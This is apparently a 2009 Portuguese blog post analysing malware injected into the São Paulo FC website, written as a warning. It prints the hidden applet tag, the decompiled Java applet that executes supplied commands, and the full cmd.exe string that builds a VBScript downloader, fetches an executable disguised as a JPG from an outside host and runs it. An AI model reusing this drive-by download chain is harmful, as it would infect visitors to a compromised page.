Início > Segurança > Site http://www.saopaulofc.com.br Hackeado

Site http://www.saopaulofc.com.br Hackeado

Conversa sobre até então uma possível Invasão:

“Fernando *Eternamente* says:
Wando?
٠•● ıl.ıl.ılıl.ıl [̲̲̅̅E̲̲̅̅] [̲̲̅̅D̲̲̅̅] [̲̲̅̅E̲̲̅̅] [̲̲̅̅R̲̲̅̅] ıl.ıl.ılıl.ıl ●•٠ says:
é agora quem podera nos defender ?
Fernando *Eternamente* says:
http://www.saopaulofc.com.br/index.php
acessa ai
٠•● ıl.ıl.ılıl.ıl [̲̲̅̅E̲̲̅̅] [̲̲̅̅D̲̲̅̅] [̲̲̅̅E̲̲̅̅] [̲̲̅̅R̲̲̅̅] ıl.ıl.ılıl.ıl ●•٠ says:
nem fudendo esse lixo ae
Fernando *Eternamente* says:
tá chamando para executar uma parada de java
٠•● ıl.ıl.ılıl.ıl [̲̲̅̅E̲̲̅̅] [̲̲̅̅D̲̲̅̅] [̲̲̅̅E̲̲̅̅] [̲̲̅̅R̲̲̅̅] ıl.ıl.ılıl.ıl ●•٠ says:
sera q foi invadido ?
Fernando *Eternamente* says:
então, eu achei estranho cara
٠•● ıl.ıl.ılıl.ıl [̲̲̅̅E̲̲̅̅] [̲̲̅̅D̲̲̅̅] [̲̲̅̅E̲̲̅̅] [̲̲̅̅R̲̲̅̅] ıl.ıl.ılıl.ıl ●•٠ says:
pera ae deixa eu ir pro desktop freebsd para abrir”

Eu sou Palmeirense antes de mais nada ..

Como é de se esperar vejam !!!

Analisando o Index.php

<applet width=’1′ height=’1′ code=’FlashPlayer.class’ archive=’http://www.sparesweb.com/images/flash.jar’&gt;

yoda# fetch http://www.sparesweb.com/images/flash.jar

yoda# file flash.jar
flash.jar: Zip archive data, at least v2.0 to extract

yoda# unzip flash.jar

inflating: META-INF/MANIFEST.MF
inflating: META-INF/FLASHPLA.SF
inflating: META-INF/FLASHPLA.DSA
inflating: FlashPlayer.class

usando engenharia reversa em FlashPlayer.class

import java.applet.Applet;
import java.io.IOException;

public class FlashPlayer extends Applet
{
public void init()
{
String str1 = getParameter(“first”);
try {
Process localProcess1 = Runtime.getRuntime().exec(str1);
}
catch (IOException localIOException1)
{
localIOException1.printStackTrace();
}

String str2 = getParameter(“second”);
try {
Process localProcess2 = Runtime.getRuntime().exec(str2);
}
catch (IOException localIOException2) {
localIOException2.printStackTrace();
}

String str3 = getParameter(“third”);
try {
Process localProcess3 = Runtime.getRuntime().exec(str3);
}
catch (IOException localIOException3) {
localIOException3.printStackTrace();
}
}
}

Analisando novamente o index.php

<param name=’first’ value=’cmd.exe /c echo Const adTypeBinary = 1 > poq.vbs & echo Const adSaveCreateOverWrite = 2 >> poq.vbs & echo Dim BinaryStream >> poq.vbs & echo Set BinaryStream = CreateObject(“ADODB.Stream”) >> poq.vbs & echo BinaryStream.Type = adTypeBinary >> poq.vbs & echo BinaryStream.Open >> poq.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> poq.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> poq.vbs & echo Function BinaryGetURL(URL) >> poq.vbs & echo Dim Http >> poq.vbs & echo Set Http = CreateObject(“WinHttp.WinHttpRequest.5.1”) >> poq.vbs & echo Http.Open “GET”, URL, False >> poq.vbs & echo Http.Send >> poq.vbs & echo BinaryGetURL = Http.ResponseBody >> poq.vbs & echo End Function >> poq.vbs & echo Set shell = CreateObject(“WScript.Shell”) >> poq.vbs & echo shell.Run “lsass.exe” >> poq.vbs & start poq.vbs http://www.mustrad.org.uk/ses/reviews/adobe.jpg lsass.exe’>

Analisando :

yoda# fetch http://www.mustrad.org.uk/ses/reviews/adobe.jpg

yoda# file adobe.jpg
adobe.jpg: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit

Olhando novamente o arquivo FlashPlayer.class, podemos notar o getParameter(“first”);  na qual permite execução de processos locais passados como parametros para o JavaApllet. Esta execução monta o segunte arquivo.

poq.vbs

Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim BinaryStream
Set BinaryStream = CreateObject(“ADODB.Stream”)
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.Write BinaryGetURL(Wscript.Arguments(0))
BinaryStream.SaveToFile Wscript.Arguments ( 1 ) , adSaveCreateOverWrite

Function BinaryGetURL ( URL )
Set Http = CreateObject(WinHttp.WinHttpRequest.5.1)
Dim Http
Set Http = CreateObject(WinHttp.WinHttpRequest.5.1)
Http.Open “GET”, URL, False
Http.Send
BinaryGetURL = Http.ResponseBody
End Function

Set shell = CreateObject(“WScript.Shell”)
shell.Run “lsass.exe”

o poq.vbs é executado tendo como parametro o jpg http://www.mustrad.org.uk/ses/reviews/adobe.jpg que como vimos  o adobe.jpg nada mais é do que um arquivo DOS executável. tornando infectado o processo Windows “lsass.exe”

 

O Problema Aparentemente foi identificado na noite de 15/10/2009.

Até a presente data da publicação desta análise hora 14:00 do dia 16/10/2009, o problema no site em questão ainda não havia sido resolvido…

 

Acho que é isso sempre Alerta …

import java.applet.Applet;
import java.io.IOException;
Categorias:Segurança
  1. Nenhum comentário ainda.
  1. outubro 17, 2009 às 5:37 pm

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s

%d blogueiros gostam disto: